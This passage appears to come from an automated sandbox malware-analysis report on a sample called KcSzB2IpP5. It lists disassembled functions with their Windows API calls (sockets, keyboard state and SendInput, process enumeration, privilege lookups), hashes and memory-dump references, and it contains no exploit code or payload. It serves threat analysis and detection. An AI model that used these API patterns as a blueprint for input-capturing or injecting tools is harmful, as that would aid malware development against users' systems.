Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 155e084a92f27a8ea4d51860a564d862674e4eac96a4edb953d7c429209080ba
Instruction ID: d16adb6ab8f304698b09f8f91e22dedf95ca4a9e886b77af0ac54f8d101a41bb
Opcode Fuzzy Hash: 155e084a92f27a8ea4d51860a564d862674e4eac96a4edb953d7c429209080ba
Instruction Fuzzy Hash: C5A16175204300AFC711DF26C485A2AB7E5FF88759F04885EF98A9B362DB34ED01CB5A

Function 004C0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004FFC08,?), ref: 004C05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004FFC08,?), ref: 004C0608
CLSIDFromProgID.OLE32(?,?,00000000,004FCC40,000000FF,?,00000000,00000800,00000000,?,004FFC08,?), ref: 004C062D
_memcmp.LIBVCRUNTIME ref: 004C064E

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 8c4efc22b16562fdcac819e3b09cac057fda697a96308c856e83e63592d4cd03
Instruction ID: f2c8149098ce91f56cd1a6b594e4811a5386cd62f1b93605d380a3b19bdde7a8
Opcode Fuzzy Hash: 8c4efc22b16562fdcac819e3b09cac057fda697a96308c856e83e63592d4cd03
Instruction Fuzzy Hash: 1C814975A00109EFCB04DFA4C984EEEB7B9FF89315F204199E506AB250DB75AE06CF64

Function 004A1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004A14C0

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c16416d9976e0c01ad5e94197b12f9e3aad5b946be87a216a28aed81835e25d0
Instruction ID: 3d9a45cc2ee043e9ba3a30df6168bfc7ea61998c651289029abd960b8d0cecf0
Opcode Fuzzy Hash: c16416d9976e0c01ad5e94197b12f9e3aad5b946be87a216a28aed81835e25d0
Instruction Fuzzy Hash: 64412D319001146BDF257BBE8C45AAF3AA4EF6B374F14067BF418D62A1E67C4841536E

Function 004F6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00FAFEE8,?), ref: 004F62E2
ScreenToClient.USER32(?,?), ref: 004F6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 004F6382

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: ee4d613605a90fa20081b328c39ce8e67ac0b92c9e04ebb339f556a069aa3b18
Instruction ID: 8f7dac4391336e0a51d6df5c6bb933d7b2f819433d625e98926621b340aeec1a
Opcode Fuzzy Hash: ee4d613605a90fa20081b328c39ce8e67ac0b92c9e04ebb339f556a069aa3b18
Instruction Fuzzy Hash: 9F514975A00209EFCB10DF68D880ABE7BB5EF55360F11816AFA159B3A0D734ED81CB54

Function 004E1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004E1AFD
WSAGetLastError.WSOCK32 ref: 004E1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004E1B8A
WSAGetLastError.WSOCK32 ref: 004E1B94

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 944fca38a186c3755b4053a6551e1c77a02ad7ced4d6e69b57bcfe1af8f0b351
Instruction ID: aa4296a52499dcebef11e80a71b98141f01c1947a8431917e988684efe775ad2
Opcode Fuzzy Hash: 944fca38a186c3755b4053a6551e1c77a02ad7ced4d6e69b57bcfe1af8f0b351
Instruction Fuzzy Hash: 7741D034640200AFE720AF21C886F6677E5AB4470CF54809EF91A8F3D2E67AED41CB95

Function 0049B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4bae734126bf12394f4fc0065302eda593aac37d160f3e5b1c975e736d2f87
Instruction ID: 0cd45b4ec3befbbaadbcc8d97ea4742bde5a02edfd8eccbd6a4151aca8cdbf77
Opcode Fuzzy Hash: 0f4bae734126bf12394f4fc0065302eda593aac37d160f3e5b1c975e736d2f87
Instruction Fuzzy Hash: 4E411375A00204BFDB24AF79D941B6ABFA9EB88724F10453FF001DB292D379A90187C4

Function 004D56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004D5783
GetLastError.KERNEL32(?,00000000), ref: 004D57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004D57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004D57FA

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 5266b43f62ceebd0948d342a6b7754a0fe0f7677d304d47a45004cd79c551665
Instruction ID: 72b352886d1c1bfcce3cd3c8bae1dd6a12202f73637d193af9f3a989e8e087f0
Opcode Fuzzy Hash: 5266b43f62ceebd0948d342a6b7754a0fe0f7677d304d47a45004cd79c551665
Instruction Fuzzy Hash: 2F415139600610DFCB10EF55C584A5EBBF1EF49328B19848AE84A9B361DB38FD50CB96

Function 0049D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00486D71,00000000,00000000,004882D9,?,004882D9,?,00000001,00486D71,?,00000001,004882D9,004882D9), ref: 0049D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0049D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0049D9AB
__freea.LIBCMT ref: 0049D9B4

Part of subcall function 00493820: RtlAllocateHeap.NTDLL(00000000,?,00531444,?,0047FDF5,?,?,0046A976,00000010,00531440,004613FC,?,004613C6,?,00461129), ref: 00493852

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: e0e8fb265fe52414d0cd0e751cd9e771735e62cade28a9d804cb5ac33f558dd5
Instruction ID: 7b869f3482898c5917c5bc972487d9e3573f0dbc9e42664656b7d78b5517e933
Opcode Fuzzy Hash: e0e8fb265fe52414d0cd0e751cd9e771735e62cade28a9d804cb5ac33f558dd5
Instruction Fuzzy Hash: BC319FB2A0020AABDF24EF65DC45EAF7BA5EF41310F05417AFC0496251E739CD55CB94

Function 004F52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 004F5352
GetWindowLongW.USER32(?,000000F0), ref: 004F5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004F5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004F53A8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: e299e16f48b6ed8ffe2b4bb6e7bc471dd49a7940e656183f40ecb16914fb5bcc
Instruction ID: 5d81402ddc7ceabadbc55dda9d4c4fe69aeb1ad6103daf4b1b585430fe299e91
Opcode Fuzzy Hash: e299e16f48b6ed8ffe2b4bb6e7bc471dd49a7940e656183f40ecb16914fb5bcc
Instruction Fuzzy Hash: 4531C134A55A0CEFEB209A1CCC45BFA7761AB04390F584003FF10963E1C7B8A951EB4A

Function 004CAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 004CABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 004CAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 004CAC74
SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 004CACC6

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4c3f1aecade54177f2fe428866c300fb645311211423de8bf3260a7f2fdfbef3
Instruction ID: 4a4697f555f7529e0b1d05a81233ed0e1e1ce7d251d103e286f4dec4b03c4df0
Opcode Fuzzy Hash: 4c3f1aecade54177f2fe428866c300fb645311211423de8bf3260a7f2fdfbef3
Instruction Fuzzy Hash: 1F311634A4421C6FFB74CB658808FFB7AA5AB45318F08421FE481922D1C37C89A5875B

Function 004F7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004F769A
GetWindowRect.USER32(?,?), ref: 004F7710
PtInRect.USER32(?,?,004F8B89), ref: 004F7720
MessageBeep.USER32(00000000), ref: 004F778C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 0442ef138908c01f5b7d513499b38ac0c3ffc4a7d42cc03ec8e98a03cad3111b
Instruction ID: 25d29bb139541714addcc71010cc2baae3c9f74c6d05a4495a540c28c27ead16
Opcode Fuzzy Hash: 0442ef138908c01f5b7d513499b38ac0c3ffc4a7d42cc03ec8e98a03cad3111b
Instruction Fuzzy Hash: 47419E35605218DFCB01EF69C894EBA77F5BB48314F1540AAE6149B361C338F946CF98

Function 004F16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004F16EB

Part of subcall function 004C3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004C3A57
Part of subcall function 004C3A3D: GetCurrentThreadId.KERNEL32 ref: 004C3A5E
Part of subcall function 004C3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004C25B3), ref: 004C3A65

GetCaretPos.USER32(?), ref: 004F16FF
ClientToScreen.USER32(00000000,?), ref: 004F174C
GetForegroundWindow.USER32 ref: 004F1752

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: e60b731af437055ec08f02f5cd2970059a060ed677b09dfd2c422559242d7018
Instruction ID: 94e5cef03271ebd4cc06ca40adbf5b9af005b46ca7bde3836fd2d4c3f63f92d4
Opcode Fuzzy Hash: e60b731af437055ec08f02f5cd2970059a060ed677b09dfd2c422559242d7018
Instruction Fuzzy Hash: 1A315075D00149AFC704EFAAC9C1CBEB7F9EF48308B50806EE415E7211E6359E45CBA5

Function 004CD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004CD501
Process32FirstW.KERNEL32(00000000,?), ref: 004CD50F
Process32NextW.KERNEL32(00000000,?), ref: 004CD52F
CloseHandle.KERNEL32(00000000), ref: 004CD5DC

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 96eaefea16c9659cf0dbecf43e7530bd8cb06b86b196108e5343187769958e3d
Instruction ID: b582bb59b0f36b2b25bf216be3acf0b43021c64848f0704f6a2a322a3e05d12e
Opcode Fuzzy Hash: 96eaefea16c9659cf0dbecf43e7530bd8cb06b86b196108e5343187769958e3d
Instruction Fuzzy Hash: 0B31A171508300AFD300EF54C981EAFBBE8EF99348F14092EF581832A1EB759948CB97

Function 004F8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00479BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00479BB2

GetCursorPos.USER32(?), ref: 004F9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004B7711,?,?,?,?,?), ref: 004F9016
GetCursorPos.USER32(?), ref: 004F905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004B7711,?,?,?), ref: 004F9094

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 352676a244573f01b52c6dc6951c82543d37bf34765c29913683e4f05c7c356a
Instruction ID: 1083476740a5b0e9dab91cbb4d7a620e3b5d30e1f986f1b205366ef8f9f0c185
Opcode Fuzzy Hash: 352676a244573f01b52c6dc6951c82543d37bf34765c29913683e4f05c7c356a
Instruction Fuzzy Hash: D2214D3560001CEFDB258FA5C898FFA7BB9EB49350F14406AF6054B2A1C7359D91DB68

Function 004CD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,004FCB68), ref: 004CD2FB
GetLastError.KERNEL32 ref: 004CD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 004CD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004FCB68), ref: 004CD376

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: beb0bee1ab94ee8bbd74d11b6982dd75af1b6e605a83134279d7c4c827a7b45f
Instruction ID: 6a0a2561bd2966b60eeb1b21ce01ea013698c255e7b75fd6360305366f6b7220
Opcode Fuzzy Hash: beb0bee1ab94ee8bbd74d11b6982dd75af1b6e605a83134279d7c4c827a7b45f
Instruction Fuzzy Hash: F121D3789042059F8300DF24C98196BB7E8EE55368F104A6FF899C72A1E734DD46CB9B

Function 004C1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004C1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004C102A
Part of subcall function 004C1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004C1036
Part of subcall function 004C1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004C1045
Part of subcall function 004C1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004C104C
Part of subcall function 004C1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004C1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004C15BE
_memcmp.LIBVCRUNTIME ref: 004C15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004C1617
HeapFree.KERNEL32(00000000), ref: 004C161E

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: d89c80c2873695ef5ac6d519f74447a42fb28b203c2f1143d6504b1090d1d9a6
Instruction ID: 673da2b6ed75c861b71a962d2447472c8315c8a1ea7953310d457e1f2facf45f
Opcode Fuzzy Hash: d89c80c2873695ef5ac6d519f74447a42fb28b203c2f1143d6504b1090d1d9a6
Instruction Fuzzy Hash: 4D217C75E40108EFDB00DFA4CA45FEEB7B8EF46344F18445AE441A7252D738AA05DB94

Function 004F2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 004F280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004F2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004F2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004F2840

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 94b25bb10fa4e8e209208e993f19be2b6b68b3f623f90dfcc2a17c1991b87d45
Instruction ID: 2186f340ea17c8287796d3f885a25b976d3bcec6d1124156cfd6ed3fd9337a0a
Opcode Fuzzy Hash: 94b25bb10fa4e8e209208e993f19be2b6b68b3f623f90dfcc2a17c1991b87d45
Instruction Fuzzy Hash: B4210231204519AFD714AB24C980FBA7795EF45328F14825AF5268B2E2C7B9EC82C7D8

Function 004C78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004C8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004C790A,?,000000FF,?,004C8754,00000000,?,0000001C,?,?), ref: 004C8D8C
Part of subcall function 004C8D7D: lstrcpyW.KERNEL32(00000000,?,?,004C790A,?,000000FF,?,004C8754,00000000,?,0000001C,?,?,00000000), ref: 004C8DB2
Part of subcall function 004C8D7D: lstrcmpiW.KERNEL32(00000000,?,004C790A,?,000000FF,?,004C8754,00000000,?,0000001C,?,?), ref: 004C8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004C8754,00000000,?,0000001C,?,?,00000000), ref: 004C7923
lstrcpyW.KERNEL32(00000000,?,?,004C8754,00000000,?,0000001C,?,?,00000000), ref: 004C7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,004C8754,00000000,?,0000001C,?,?,00000000), ref: 004C7984

Strings

cdecl, xrefs: 004C797B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd
